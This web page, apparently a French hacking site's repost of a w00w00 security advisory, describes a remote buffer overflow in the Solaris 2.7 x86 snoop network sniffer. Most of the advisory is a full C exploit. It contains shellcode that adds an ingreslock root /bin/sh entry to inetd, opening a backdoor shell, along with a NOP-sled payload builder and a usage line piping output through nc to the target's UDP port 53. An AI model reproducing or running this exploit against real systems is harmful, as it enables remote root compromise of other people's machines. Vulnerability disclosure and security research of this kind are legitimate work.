w00giving 99 -9- |
||||
|
w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html Discovered by: K2 (ktwo@ktwo.ca) Snoop is a program similar to tcpdump that allows one to watch network traffic. There is a buffer overflow in the snoop program when run in verbose (-v) mode that occurs when a domain name greater than 1024 bytes is logged, because it will overwrite a buffer in print_domain_name. This vulnerability allows remote access to the system with the privileges of the user who ran snoop (usually root, because it requires read privileges on special devices). --------------------------------------------------------------------------- Exploit (by cheez): /* Remote Solaris 2.7 x86 snoop exploit Run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop -v" Thanks str/horizon for shellcodes (hi plaguez) */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;" "/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 char buffer[SIZE]; const char x86_nop=0x90; long nop=NOPDEF, esp=0x8047344, offset=DEFOFF; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; fprintf(stderr,"0x%x\n", esp+offset); printf("%s", buffer); return 0; } --------------------------------------------------------------------------- Patch: Because Sun Microsystems doesn't include source, we must wait for them to release a patch. --------------------------------------------------------------------------- http://www.roses-labs.com, http://www.napster.com, http://www.technotronic.com, http://www.w00w00.org
|
Page d'accueil Nous écrire By mail Nous envoyer des commentaires By la page de le Feed-Back |
Nouveautés
et... |
Le Sommaire de Kitetoa (orientation...) Sommaire général du site |
Les
rubriques! Les
livres publiés par Kitetoa |
Les
rubriques! (suite) Les Let-R-s Des Images On s'en fout! KitEcout' KessTaVu? -KiteToile Voyages |
Les dossiers : Precision [ZataZ] Le monde fou des Admins Defcon Le hack le plus bizarre Guerre de l'info Convention contre la cyber-criminalité Hack |
Questionnaire visant à améliorer le contenu de ce site si c'est possible et pas trop compliqué |
Rechercher sur le site ...et sur le Net Des liens et D'autres choses du Ouèb |